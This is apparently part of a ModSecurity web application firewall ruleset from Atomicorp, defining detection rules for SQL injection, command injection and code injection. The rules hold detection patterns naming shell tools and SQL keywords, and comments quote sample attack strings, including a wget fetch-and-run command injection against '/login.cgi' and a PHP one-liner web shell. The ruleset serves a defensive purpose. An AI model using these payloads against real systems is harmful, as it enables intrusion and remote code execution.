SecRule REQUEST_URI|XML:/*|ARGS|!ARGS:/insertstring/|!ARGS:contenido|!ARGS:/sql/|!ARGS:prefix|!ARGS:query|!ARGS:/narrative/|!ARGS:templatecode|!ARGS:/^Cms_Page/|!ARGS:pagetext|!ARGS:/database/|!ARGS:areas "(?:(?:\bunion\b.{1,100}?\bselect\b.{1,100}?php.{1,100}?(?:system|eval ?\(|shell_exec|preg_\w+|passthru|create_function|serialize|exec).{1,100}?into)|select.{1,100}?(?:php|perl).{1,100}?into outfile|insert into.{1,100}file_put_contents)" "phase:2,deny,log,auditlog,status:403,capture,t:none,t:urlDecodeUni,t:replaceComments,t:compressWhiteSpace,t:lowercase,msg:'Atomicorp.com WAF Rules: SQL injection with PHP/PERL payload - hex encoded',id:381026,rev:3,logdata:'%{TX.0}',severity:'2',tag:'SQLi'"
SecMarker END_SQL_INJECTION_RULE_3

#SQL inline command attack with more AE cases
SecRule ARGS|XML:/*|!ARGS:SAMLResponse|!ARGS:areas|!ARGS:templatecode|!ARGS:/^Cms_Page/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/teaser/|!ARGS:wpSummary|!ARGS:/narrative/|!ARGS:templatecode|!ARGS:/insertstring/|!ARGS:areas|!ARGS:contenido|!ARGS:/sql/|!ARGS:prefix|!ARGS:content|!ARGS:file_content|!ARGS:query|!ARGS:/descr/|!ARGS:/body/|!ARGS:/text/|!ARGS:fck_tw_body|!ARGS:sub|!ARGS:msg_body|!ARGS:saved_data|!ARGS:fck_body|!ARGS:text|!ARGS:form[pagina_text]|!ARGS:description|!ARGS:/message/|!ARGS:content|!ARGS:/report/ "@pm char execute convert delete insert select drop create table declare null accesslevel user_name concat( union case xecresultset ;set @ cast" "phase:2,id:333804,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:replaceComments,t:compressWhiteSpace,multiMatch,pass,nolog,noauditlog,skip:1"
SecAction "phase:2,id:334365,t:none,pass,nolog,noauditlog,skipAfter:END_SQL_INJECTION_RULE_4"

SecRule ARGS|XML:/*|!ARGS:/replaceAll/|!ARGS:areas|!ARGS:/^wpt_/|!ARGS:field_value_mapping|!ARGS:/post_code/|!ARGS:tHtml|!ARGS:/_dnn/|!ARGS:actionFilter|!ARGS:Error|!ARGS:code|!ARGS:thecode|!ARGS:param[DEFAULTVALUE]|!ARGS:/database/|!ARGS:/insertstring/|!ARGS:pagetext|!ARGS:templatecode|!ARGS:/insertBefore/|!ARGS:/insertAfter/|!ARGS:data|!ARGS:resolution|!ARGS:/prependTo/|!ARGS:/appendTo/|!ARGS:/prevObject/|!ARGS:/^Cms_Page/|!ARGS:json|!ARGS:/php/|!ARGS:wpSummary|!ARGS:/teaser/|!ARGS:fdata|!ARGS:file_content|!ARGS:/narrative/|!ARGS:data|!ARGS:/database/|!ARGS:/sql/|!ARGS:prefix|!ARGS:contenido|!ARGS:query|!ARGS:/descr/|!ARGS:/body/|!ARGS:/text/|!ARGS:/txt/|!ARGS:fck_tw_body|!ARGS:sub|!ARGS:msg_body|!ARGS:saved_data|!ARGS:fck_body|!ARGS:description|!ARGS:/message/|!ARGS:/content/|!ARGS:comment|!ARGS:p_action|!ARGS:/report/|!ARGS:/narrative/|!ARGS:/FCKeditor/  "(?:\w ?(?:user|and) {1,100}. char\([0-9]| \b(?:execute|convert)\(|; ?\bdelete\b.{1,100}?;(?:insert|declare ?\@|varchar) ?|and .{1,100} \( ?select .{1,100} from |\bdrop\b {1,100}. table |(?:declare|convert) .{1,100} varchar\(|null ?, ?(?:null ?, ?(?:null|accesslevel|user_name)) ?,|\bconcat\(|union select |union all select|\bcast\b .{1,50}\( as |xecresultset|' ?; ?declare\b @|; ?set @|select (?:load_file|char\()|(?:insert|remark)test ?;|\bcreate\b table [a-z0-9]+ \()" "chain,phase:2,deny,log,auditlog,status:403,capture,id:340159,t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,rev:39,severity:2,msg:'Atomicorp.com WAF Rules: Generic SQL inline command protection (MM)',logdata:'%{TX.0}',multiMatch,tag:'SQLi'"
SecRule REQUEST_URI "!(?:/install/index\.php|/admin/fetch_data_af\.php\?action=create_txt_file_from_af_table$|/admin/structure/feeds/edit|^/([a-z]+/)?wp-admin/(?:admin|options-general)\.php\?page=wpsc-settings|/horde/services/ajax\.php/kronolith|^/\?option=com_easyblog|^/administrator/index.php?option=com_droptables|^/dev/node/|^/node/[0-9]+)" "t:none,t:lowercase"

SecMarker END_SQL_INJECTION_RULE_4

SecRule  REQUEST_HEADERS|XML:/*|!REQUEST_HEADERS:Referer|!REQUEST_HEADERS:Cookie|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|!REQUEST_COOKIES_NAMES:/utm/|!REQUEST_COOKIES_NAMES:/_pk_ref/|REQUEST_URI|ARGS|ARGS_NAMES|!ARGS:SAMLResponse|!ARGS:/^Cms_Page/|!ARGS:/database/|!ARGS:/insertstring/|!ARGS:areas|!ARGS:templatecode|!ARGS:/narrative/|!ARGS:wpSummary|!ARGS:/database/|!ARGS:/text/|!ARGS:pass|!ARGS:meta_descr|!ARGS:text|!ARGS:edited|!ARGS:content|!ARGS:description|!ARGS:introtext|!ARGS:Post|!ARGS:/sql/|!ARGS:prefix|!ARGS:query|!ARGS:itembigtext|!ARGS:article_content|!ARGS:body|!ARGS:mytextarea|!ARGS:ll_content_message|!ARGS:page-content|!ARGS:reply|!ARGS:xml|!ARGS:content_en|!ARGS:filecontent|!ARGS:message|!ARGS:content_en|!ARGS:general[description]|!ARGS:response[14]|!ARGS:article|!ARGS:wptextbox1 "@pm cast xecresults declare" "phase:2,id:333805,t:none,t:replaceComments,t:compressWhiteSpace,t:lowercase,pass,nolog,noauditlog,skip:1"
SecAction "phase:2,id:334366,t:none,pass,nolog,noauditlog,skipAfter:END_SQL_INJECTION_RULE_5"

#SQL Injection cases
SecRule REQUEST_HEADERS|XML:/*|!REQUEST_HEADERS:Referer|!REQUEST_HEADERS:Cookie|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|!REQUEST_COOKIES_NAMES:/utm/|!REQUEST_COOKIES_NAMES:/_pk_ref/|REQUEST_URI|ARGS|ARGS_NAMES|!ARGS:/^Cms_Page/|!ARGS:/database/|!ARGS:/insertstring/|!ARGS:pagetext|!ARGS:code|!ARGS:wpSummary|!ARGS:areas|!ARGS:templatecode|!ARGS:comment|!ARGS:/database/|!ARGS:/text/|!ARGS:pass|!ARGS:meta_descr|!ARGS:text|!ARGS:edited|!ARGS:content|!ARGS:description|!ARGS:introtext|!ARGS:Post|!ARGS:/sql/|!ARGS:prefix|!ARGS:query|!ARGS:itembigtext|!ARGS:article_content|!ARGS:body|!ARGS:mytextarea|!ARGS:ll_content_message|!ARGS:page-content|!ARGS:reply|!ARGS:xml|!ARGS:content_en|!ARGS:filecontent|!ARGS:/message/|!ARGS:content_en|!ARGS:general[description]|!ARGS:response[14]|!ARGS:article|!ARGS:wptextbox1 "(?:\bcast\b .{1.100} ?\(.{1,100} as |xecresultset|; ?declare\b ?\@)" "phase:2,deny,log,auditlog,status:403,capture,id:340164,t:none,t:replaceComments,t:compressWhiteSpace,t:lowercase,rev:11,severity:2,msg:'Atomicorp.com WAF Rules: SQL Injection Attack',logdata:'%{TX.0}',tag:'SQLi'"
SecMarker END_SQL_INJECTION_RULE_5

SecRule ARGS|REQUEST_URI|XML:/*|REQUEST_HEADERS|ARGS_NAMES|!ARGS:SAMLResponse|!ARGS:/^Cms_Page/|!ARGS:/database/|!ARGS:/insertstring/|!ARGS:pagetext|!ARGS:contenido|!ARGS:/report/|!ARGS:wpSummary|!ARGS:/teaser/|!ARGS:/txt/|!ARGS:/narrative/|!ARGS:/text/|!ARGS:areas|!ARGS:templatecode "@pm = char( varchar execute convert delete insert declare select drop create table convert( null accesslevel user_name concat( union cast xecresultset" "phase:2,id:333806,t:none,t:replaceComments,t:compressWhiteSpace,pass,nolog,noauditlog,skip:1"
SecAction "phase:2,id:334367,t:none,pass,nolog,noauditlog,skipAfter:END_SQL_INJECTION_RULE_6"
#Always bad SQL injection case w/ antievasion
#SecRule ARGS|!ARGS:/^fulltext/|!ARGS:message|ARGS_NAMES|REQUEST_FILENAME|REQUEST_HEADERS|XML:/*|!REQUEST_HEADERS:Referer|!REQUEST_HEADERS:Cookie|!ARGS:topicseen|!ARGS_NAMES:posted_data[product_substring]|!REQUEST_HEADERS:X-PageView "\b(\d+) ?= ?\1\b|[\'\"](\w+)[\'\"] ?= ?[\'\"]\2\b" 
SecRule ARGS|!ARGS:Db_submit|!ARGS:/installcode/|!ARGS:/^fulltext/|!ARGS:contenido|!ARGS:/sql/|!ARGS:prefix|!ARGS:wpSummary|!ARGS:query|!ARGS:message|ARGS_NAMES|!ARGS:/narrative/|REQUEST_HEADERS|!ARGS:/^Cms_Page/|!ARGS:areas|!ARGS:/database/|!ARGS:/insertstring/|!ARGS:pagetext|!ARGS:templatecode|XML:/*|!REQUEST_HEADERS:Referer|!REQUEST_HEADERS:Cookie|!ARGS:comment|!ARGS:topicseen|!ARGS_NAMES:posted_data[product_substring]|!REQUEST_HEADERS:X-PageView "\b(\d+) ?= ?\1\b|[\'\"](\w+)[\'\"] ?= ?[\'\"]\2\b" "phase:2,deny,log,auditlog,status:403,capture,id:340156,capture,t:none,t:htmlEntityDecode,t:urlDecodeUni,t:replaceComments,t:compressWhiteSpace,t:lowercase,rev:14,severity:2,msg:'Atomicorp.com WAF Rules: Generic SQL injection protection',logdata:'%{TX.0}',logdata:'%{TX.0}',tag:'SQLi'"

SecRule REQUEST_URI "(?:/install/index\.php|/index\.php\?mode=install&sub=create_table$|^/admin/test/examples/txtsqladmin/index\.php|^/store/images/|^/([a-z]+/)?wp-admin/(?:admin|options-general)\.php\?page=wpsc-settings|/horde/services/ajax\.php/kronolith)"  "phase:2,t:none,t:lowercase,id:344368,pass,nolog,noauditlog,skipAfter:END_RULE_340157"

#SQL inline command attac
SecRule REQUEST_HEADERS|!REQUEST_HEADERS:Referer|!REQUEST_HEADERS:Cookie|!REQUEST_COOKIES|XML:/*|ARGS|!ARGS:article|!ARGS:/post_code/|!ARGS:error|!ARGS:thecode|!ARGS:/template/|!ARGS:/replaceAll/|!ARGS:/insertBefore/|!ARGS:/insertAfter/|!ARGS:/prependTo/|!ARGS:/^Cms_Page/|!ARGS:/insertstring/|!ARGS:pagetext|!ARGS:/appendTo/|!ARGS:json|!ARGS:panels_data|!ARGS:field_value_mapping|!ARGS:data|!ARGS:areas|!ARGS:/^field_aut_content/|!ARGS:/^field_id/|!ARGS:actionFilter|!ARGS:post_excerpt|!ARGS:post_content|!ARGS:/^body/|!ARGS:response|!ARGS:/wp_autosave/|!ARGS:SAMLResponse|!ARGS:templatecode|!ARGS:contenido|!ARGS:/txt/|!ARGS:/text/|!ARGS:/teaser/|!ARGS:wpSummary|!ARGS:/narrative/|!ARGS:/installcode/|!ARGS:/php/|!ARGS:content|!ARGS:file_content|!ARGS:faqs_answer|!ARGS:/^para/|!ARGS:keywords|!ARGS:code|!ARGS:/sql/|!ARGS:prefix|!ARGS:data|!ARGS:/database/|!ARGS:/description/|!ARGS:alternate1|!ARGS:comment|!ARGS:body|!ARGS:fulldescr|!ARGS:article_content|!ARGS:query|!ARGS:/text/|!ARGS:txt|!ARGS:action|!ARGS:Db_submit|!ARGS:saved_data|!ARGS:form[pagina_text]|!ARGS:/message/|!ARGS:steps|!ARGS:fck_body|!ARGS:p_action|!ARGS:newcontent|!ARGS:/report/|!ARGS:/narrative/|!ARGS:/FCKeditor/  "(?:\w ?(?:user|and)(\w+)char ?\([0-9]| \b(?:execute|convert) ?\(|; ?\bdelete\b.{1,100}?; ?(?:insert|declare @|varchar) ?|\bdrop\b .{1,100} table |(?:declare|convert) .{1,100} varchar\(|null ?, ?null ?, ?(?:accesslevel|user_?name) ?,|\bconcat\(|union select |union all select|xecresultset|' ?; ?declare\b ?@|; ?set @|select (?:load_file|char ?\()|(?:insert|remark)test;|\bcreate\b table [a-z0-9]+ \()" "phase:2,deny,log,auditlog,status:403,capture,id:340157,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:replaceComments,t:compressWhiteSpace,t:lowercase,rev:38,severity:2,msg:'Atomicorp.com WAF Rules: Generic SQL inline command protection',logdata:'%{TX.0},%{matched_var_name}',tag:'SQLi'"
SecMarker END_RULE_340157

#additional SQL injection checks on cookies
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/utm/   "(?:(\w+)(?:user|and)(\w+)char\([0-9]+\)|\b(?:execute|convert)\(|; ?\bdelete\b.{1,100}?; ?(?:insert|declare @|varchar) ?|and .{1,100} \(select |\b(?:drop|create)\b(\w+)table\b|(?:declare|convert) .{1,100} varchar\(|null ?, ?null ?, ?(?:accesslevel|user_?name) ?,|concat\(|union select |union all select|\bcast\b ?\(.{1,100} as |xecresultset|' ?; ?declare\b ?@|; ?set @|select (?:load_file|char\()|(?:insert|remark)test;)" "phase:2,deny,log,auditlog,status:403,capture,id:340181,t:none,t:htmlEntityDecode,t:replaceComments,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Generic SQL inline command protection',logdata:'%{TX.0}',tag:'SQLi'"
SecMarker END_SQL_INJECTION_RULE_6

SecMarker END_SQL_CHECKS_3

SecMarker END_SQL_CHECKS_EVERYTHING

############ COMMAND INJECTION RULES #########################

#Needs work, too greedy
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/*|!ARGS:shortcodes|!ARGS:/content/|!ARGS:/scripttag/|!ARGS:/description/|!ARGS:/wp_autosave/|!ARGS:/html/|!ARGS:/text/|!ARGS:/message/|!ARGS:answer|!ARGS:affiliatelinks|!ARGS:body|!ARGS:/body/|!ARGS:/comment/|!ARGS:/signature/ "@rx (?:\$(?:\((?:\(.*\)|.*)\)|\{.*\})|[<>]\(.*\))" "phase:2,status:403,deny,id:393655,rev:15,t:none,t:urlDecodeUni,t:cmdLine,capture, msg:'Atomicorp.com WAF Rules: Possible Remote Command Execution: Unix Shell Expression Found',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',tag:'attack-rce',ctl:auditLogParts=+E,log,auditlog"

SecRule REQUEST_URI|REQUEST_COOKIES|!REQUEST_COOKIES:/utm/|!REQUEST_COOKIES:/_pk_ref/|ARGS|!ARGS:fileContent|!ARGS:title|!ARGS:templatecode|!ARGS:areas|!ARGS:/template/ "@pm exec cmd cd ls pwd perl echo uname curl kill sh cp python chown rm rsync rdiff-backup wget ftpget links g++ chgrp chown passwd bash telnet wguest csh tcsh wsh fetch dash rcmd ftp cmd32 nmap net nc \# \| \; \` ping sleep benchmark || powershell" "phase:2,id:333807,rev:2,t:none,t:urlDecodeUni,t:cmdline,t:normalizePath,multimatch,pass,nolog,noauditlog,skip:1"
SecAction "phase:2,id:334368,t:none,pass,nolog,noauditlog,skipAfter:END_CMD_INJECTION_RULE_1"

#<!--#exec cmd
SecRule REQUEST_URI|ARGS "<\!--#exec cmd" "phase:1,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:cmdline,t:lowercase,id:393654,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - command injection in URL|ARGS blocked'"



#command injection
#/login.cgi?cli=aa%20aa%27;wget%20http://1.2.3.4/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$
SecRule REQUEST_URI "\' ?; ?(?:(?:w|ftp)get|curl) " "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:compressWhitespace,t:cmdline,t:lowercase,id:393653,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - command injection in URL blocked'"


# Rule 340014:
#Prevent command injection through cookies
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/utm/|!REQUEST_COOKIES:/_pk_ref/|ARGS|!ARGS:fileContent|!ARGS:message|!ARGS:message_html|!ARGS:SAMLResponse|!ARGS:areas|!ARGS:/template/|!ARGS:site_first|!ARGS:sendDescription|!ARGS:templatecode|!ARGS:areas|!ARGS:wpSummary|!ARGS:/keyword/ "(?: ?(?:\bcurl\b|(?:w|ftp)get) (-l )?(?:http|(?:s|t)?ftp|\- |dict|smb|file|gopher|imap|ldap|pop|rt|scp|smtp|telnet)| ?(?:cmd|command) ?= ?(?:chdir|mkdir|rm) |cd /(?:tmp|/var/tmp|/etc/|/proc|\.\.) |\|id ?\; ?echo.{1,200}\||\b(?:(?:n(?:map|et|c)|w(?:guest|sh)|telnet|r?cmd|ftp)\.exe\b|c(?:md|ommand)(?:(?:32)?\.exe\b|\b /[ck])))" "phase:2,deny,log,auditlog,status:403,capture,t:none,t:urlDecodeUni,t:cmdline,t:normalizePath,t:replaceNulls,chain,id:340014,rev:19,severity:2,msg:'Atomicorp.com WAF Rules: CMD injection',logdata:'%{TX.0}',tag:'Command Injection'"
SecRule REQUEST_URI "!(?:/count\.cgi|^/magento/index\.php/admin/dashboard/|^/images/stories/|^/content/pdf/media/print)" "t:none,t:lowercase"

# Rule 340014:
#Prevent command injection through cookies
SecRule REQUEST_URI "(?: ?(?:\bcurl\b|(?:w|ftp)get) (?:http|(?:s|t)?ftp|\- |dict|smb|file|gopher|imap|ldap|pop|rt|scp|smtp|telnet)| ?(?:cmd|command) ?= ?(?:chdir|mkdir|rm) |cd /(?:tmp|/var/tmp|/etc/|/proc|\.\.) |\|id ?\; ?echo.{1,200}\||\b(?:(?:n(?:map|et|c)|w(?:guest|sh)|telnet|r?cmd|ftp)\.exe\b|c(?:md|ommand)(?:(?:32)?\.exe\b|\b /[ck])))" "phase:2,deny,log,auditlog,status:403,capture,t:none,t:urlDecodeUni,t:cmdline,t:normalizePath,t:replaceNulls,chain,id:340193,rev:17,severity:2,msg:'Atomicorp.com WAF Rules: CMD injection in URI',logdata:'%{TX.0}',tag:'Command Injection'"
SecRule REQUEST_URI "!(?:/count\.cgi|^/magento/index\.php/admin/dashboard/|^/images/stories/|^/content/pdf/media/print)" "t:none,t:lowercase"


# Rule 340018:
#Generic command line attack filter
#SecRule REQUEST_URI "\|.*;.*;.*\|" "phase:2,deny,status:403,capture,t:none,t:urlDecodeUni,chain,id:340018,rev:10,severity:2,msg:'Atomicorp.com WAF Rules: Generic command line attack filter',logdata:'%{TX.0}'"
#SecRule REQUEST_URI "!(?:/count\.cgi|^/magento/index\.php/admin/dashboard/|^/images/stories/|^/content/pdf/media/print)" "t:none,t:lowercase"

# Rule 340029: script, perl, etc. code
SecRule REQUEST_URI|ARGS|!ARGS:/canvas/|!ARGS:screenshot_png|!ARGS:/^acf/|!ARGS:fileContent|!ARGS:/_edit_/|!ARGS:/details/|!ARGS:/signature/|!ARGS:/block_value/|!ARGS:/News/|!ARGS:/products_/|!ARGS:/article/|!ARGS:/template/|!ARGS:editor1|!ARGS:prefix|!ARGS:suffix|!ARGS:/info/|!ARGS:__VIEWSTATE|!ARGS:payment_extrainfo|!ARGS:file|!ARGS:thecode|!ARGS:/chat/|!ARGS:snippet|!ARGS:/phpcode/|!ARGS:intro|!ARGS:/title/|!ARGS:/data_parent/|!ARGS:code|!ARGS:lajmi|!ARGS:/vgo_ee/|!ARGS:/content/|!ARGS:/desc/|!ARGS:/hilit/|!ARGS:/hilight/|!ARGS:/highlight/|!ARGS:/body/|!ARGS:/post/|!ARGS:/txt|!ARGS:/content/|!ARGS:/keyword/|!ARGS:/summary/|!ARGS:/note/|!ARGS:/solution/|!ARGS:/msg/|!ARGS:/highlight/|!ARGS:/text/|!ARGS:/subject/|!ARGS:st|!ARGS:/message/|!ARGS:/post/|!ARGS:/resolution/|!ARGS:/problem/|!ARGS:/disallowed/ "(?:;|/|\| )(?:\b(?:cat|ls|perl|uname|pwd|cp|tclsh8?|cpp|f(?:etch|tp)|python|chown|rm|ping|rsync|rdiff-backup|scp|(?:w|ftp)get|curl|links|g\+\+|ch(?:grp|own)|passwd|r?(?:b|d)ash|t?c?sh|telnet|clang|nc)\b |\b(?:sleep|benchmark)\b \(? ?[0-9]|powershell -w|\bkill(?: (?:[0-9]|-)|all\ ))" "log,auditlog,phase:2,deny,log,status:403,capture,id:340029,t:none,t:utf8toUnicode,t:urlDecodeUni,t:replaceNulls,t:cmdLine,rev:40,severity:2,msg:'Atomicorp.com WAF Rules: Attack Blocked - command in REQUEST_URI or Argument',logdata:'%{TX.0}'"


# Rule 340030: generic command line attack
SecRule REQUEST_URI "\|*(?:id|echo|uname|pwd) ?\;" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:lowercase,chain,id:340030,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Pipe command line probe'"
SecRule REQUEST_URI "(?:id|echo|uname) ?; ?\|"

SecMarker END_CMD_INJECTION_RULE_1

#SecRule REQUEST_FILENAME "\.(?:(?:m|j)pe?g4?|bmp|tiff?|p(?:(?:p|g|b)m|n(?:g|m)|df)|gif|js|css|ico|avi|w(?:mv|ebp)|mp(?:3|4)|cgm|svg|swf|og(?:m|v|x))$" phase:2,pass,t:none,t:lowercase,nolog,noauditlog,skipAfter:END_CMD_INJECTION_RULE_2
#Possible command injection attack
#SecRule ARGS "`" "phase:2,t:none,t:urlDecodeUni,t:htmlEntityDecode,multimatch,pass,nolog,noauditlog,skip:1"
#SecAction phase:2,pass,nolog,noauditlog,skipAfter:END_CMD_INJECTION_RULE_2
#
#SecRule ARGS "` ?`.*\+ ?\".*` ?`"         "capture,t:urlDecodeUni,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,multimatch,auditlog,msg:'Atomicorp.com WAF Rules: Attack Blocked -  Command Injection Attack',id:'380014',rev:1,severity:'2'"
#
#SecMarker END_CMD_INJECTION_RULE_2

#SecRule REQUEST_FILENAME "\.(?:(?:m|j)pe?g4?|bmp|tiff?|p(?:(?:p|g|b)m|n(?:g|m)|df)|gif|js|css|ico|avi|flv|w(?:m(?:v|a)|ebp)|mp(?:3|4)|cgm|svg|swf|og(?:m|v|x)|doc|xls|od(?:t|s)|ppt|wbk)$" phase:2,id:333949,pass,t:none,t:lowercase,nolog,noauditlog,skipAfter:END_CMD_INJECTION_RULE_3
#
#SecRule ARGS|!ARGS:areas|!ARGS:/template/ "`" "phase:2,id:333808,t:none,t:urlDecodeUni,t:lowercase,pass,nolog,noauditlog,skip:1"
#SecAction phase:2,id:334369,t:none,pass,nolog,noauditlog,skipAfter:END_CMD_INJECTION_RULE_3
#
#SecRule ARGS "` ?`.*\+ ?\".*` ?`"         "phase:2,deny,status:403,capture,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,auditlog,msg:'Atomicorp.com WAF Rules: Attack Blocked -  Command Injection Attack',id:'380015',rev:1,severity:'2'"
#SecMarker END_CMD_INJECTION_RULE_3

################# BAD FUNCTION RULES #########################


# Rule 340082: SMTP redirects
SecRule REQUEST_URI_RAW "^(?:(?:ht|f)tps?|connect):/.+\:(25|465|587)"  "phase:2,deny,log,auditlog,status:403,t:none,t:lowercase,id:340082,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: SMTP redirect over http attempt'"

#types that do not have RFI at all
SecRule TX:STATIC "@eq 1" "phase:2,id:'334817',pass,t:none,nolog,noauditlog,skipAfter:END_INJECTION_RULES_ALL"

#parallel skip
SecRule REQUEST_URI|REQUEST_HEADERS|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS|ARGS_NAMES|XML:/* "@pm include post_ onerror python printf bin ifs cat" "phase:2,id:344375,t:none,t:utf8toUnicode,t:urlDecodeUni,t:removeComments,t:removewhitespace,pass,nolog,noauditlog,skip:1"
        SecAction "phase:2,id:334373,t:none,pass,nolog,noauditlog,skipAfter:END_CMD3_ALL"

#<?=$_POST[0]?>
#GET /<!--#include+file=”UUUUUUUU...UU”--> HTTP/1.1
SecRule REQUEST_URI|REQUEST_HEADERS|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS|!ARGS:/message/|ARGS_NAMES|XML:/* "<(?:\!--\#includefile=|\?=\$_post\[0\])" "phase:2,deny,log,auditlog,status:403,capture,t:none,t:utf8toUnicode,t:urlDecodeUni,t:removeComments,t:removewhitespace,t:lowercase,msg:'Atomicorp.com WAF Rules: Code injection',id:380027,rev:2,logdata:'%{TX.0}',severity:'2',tag:'RCE'"

#python/object/new
SecRule REQUEST_URI|REQUEST_HEADERS|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS|!ARGS:/message/|ARGS_NAMES|XML:/* "(?:\!python/object/new|onerrorresumenext\:function)" "phase:2,deny,log,auditlog,status:403,capture,t:none,t:utf8toUnicode,t:urlDecodeUni,t:removeComments,t:removewhitespace,t:lowercase,msg:'Atomicorp.com WAF Rules: Code injection',id:380028,rev:1,logdata:'%{TX.0}',severity:'2',tag:'RCE'"

#$IFS$
SecRule REQUEST_URI|REQUEST_HEADERS|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS|!ARGS:/message/|ARGS_NAMES|XML:/* "\$IFS\$" "phase:2,deny,log,auditlog,status:403,capture,t:none,t:utf8toUnicode,t:urlDecodeUni,t:removeComments,t:removewhitespace,t:lowercase,msg:'Atomicorp.com WAF Rules: Code injection',id:344377,rev:1,logdata:'%{TX.0}',severity:'2',tag:'RCE'"

#(printf
#|/bin/id|
#; cat /
SecRule REQUEST_URI|REQUEST_HEADERS|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS|!ARGS:/message/|ARGS_NAMES|XML:/* "(?:\(printf|\| ?/bin/id ?\|; cat /)" "phase:2,deny,log,auditlog,status:403,capture,t:none,t:utf8toUnicode,t:urlDecodeUni,t:removeComments,t:compresswhitespace,t:lowercase,msg:'Atomicorp.com WAF Rules: Code injection',id:344376,rev:1,logdata:'%{TX.0}',severity:'2',tag:'RCE'"

SecMarker END_CMD3_ALL

#additional types
SecRule REQUEST_FILENAME "(?:\.(?:cgi|js(?:on|f|pa?)|pl|aspx?|cfml?|do)$|/cgi-?(?:bin|cdn)/|/[a-z]+-cgi/)" "phase:2,id:333810,pass,setvar:tx.nonphp=1,t:none,nolog,noauditlog,skipAfter:END_INJECTION_RULES_ALL"

#Bad function rules
# Rule 340019:
#Generic PHP bad functions protection
#PHP copy() function: http://securitytracker.com/alerts/2006/Apr/1015882.html
SecRule ARGS "compress\.zlib ?:" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:lowercase,id:340019,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Generic PHP bad functions protection'"

#RFI/injection rules
SecRule ARGS|REQUEST_URI|!ARGS:templatecode|!ARGS:areas|!ARGS:/url/|!ARGS:SAMLResponse "@pm http:// https:// ftp:// ftps:// ogg:// tls://  data:// php:// zlib:// gopher:// compress.zlib connect phar:// rar:// expect:// zip:// ssh2:// dict:// ssh:// file:// ssl:// glob:// s3:// scp://" "phase:2,id:333812,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:replaceNulls,t:compressWhiteSpace,pass,nolog,noauditlog,skip:1"
        SecAction "phase:2,id:334370,t:none,pass,nolog,noauditlog,skipAfter:END_INJECTION_RULES_ALL"

#pdf, which may have an arg as part of an XSS attack but no other RFI methods
SecRule REQUEST_FILENAME "\.pdf$" "phase:2,id:333813,pass,t:none,t:lowercase,nolog,noauditlog,skipAfter:END_INJECTION_RULES"

SecRule REQUEST_FILENAME "\.(?:xml|html?)$" "phase:2,id:333811,pass,t:none,t:lowercase,nolog,noauditlog,skipAfter:END_INJECTION_RULES_1"

#Skip these rules if its not a POST or GET
SecRule REQUEST_METHOD "!(?:GET|POST)" "id:382191,phase:2,t:none,skipAfter:END_INJECTION_RULES_1,nolog,noauditlog,pass"


# Rule 340162: Generic PHP code injection protection in URI w/ anti-evasion
SecRule REQUEST_URI "(?:/(?:(?:wp-admin/(page|post|widgets|link|network/site-settings\.php|options|themes/basic/themify/img\.php\?src=|admin\.php?cf/cf\.php)|admin/(?:edittemplate|webpage_update|theme-options|add_edit_)|(?:signup|cpinquiry|profile))\.php|p(?:(?:hpbb\/install\/install\.ph|l\/download\?file=htt)p|roxy\/cb_proxy\.\?a=http:\/\/)|i(?:ndex\.php\/admin\/system_config\/save\/section\/payment\/|mp\/compose\.php)|tiki-(?:objectpermissions|editpage|view_cache)|jomsocial\/[a-z]+\/(?:edit|add))|^(?:\/(?:(?:[a-z0-9\-]+\/events\?(?:utm_|trk_)|node\/[0-9]+\/(?:edit|add)|[a-z]+\/unsubscribe)|(?:mysqldumper\/dump|xmlrpc)\.php$|go\.php\?u=affilorama&t=http:\/\/|\.services\/sitelogout)|/(?:b/ss/mxmacromedia|horde/services/go|node/add|cas/))|(?:(?:jw_allvideos_player|mod_mp3player)\?(?:file|playlist)=htt|ubbthreads\/admin\/dofeatures\.ph)p|ad-?server\/adjs|\?mode=addshout|^/administrator/index\.php\?option=com_rsform|^/index\.php/profile/register/registerprofile|^/[a-z]+/edit|^/(?:elements|admin/media)/(?:s(?:ave|ettings?)|appearance)/|^/panel\?comd=nlwebform|^/cocms/index\.php\?|^/ls_javascript_combine/|^/index\.php\?option=com_rsform|^/killboard/\?a=admin_idfeedsyndication|^/api/users|^/numo/module/form_handler/|^/admin/add_edit_document|^/\?br=|^/app\.php/dl_ext/\?view=upload|^/index\.php\?option=com_uniform|^/\?_task=mail|^/index\.php\?p=admin/actions/elements/|^/?amoptimizer_bundle_check|^/\?wc-ajax|^/index\.php\?get=film&doaction=resultat)" "phase:2,id:333814,rev:6,pass,t:none,t:lowercase,nolog,noauditlog,skipAfter:END_INJECTION_RULES_1"

#SecRule ARGS "!@pmFromFile trusted-domains.txt" chain
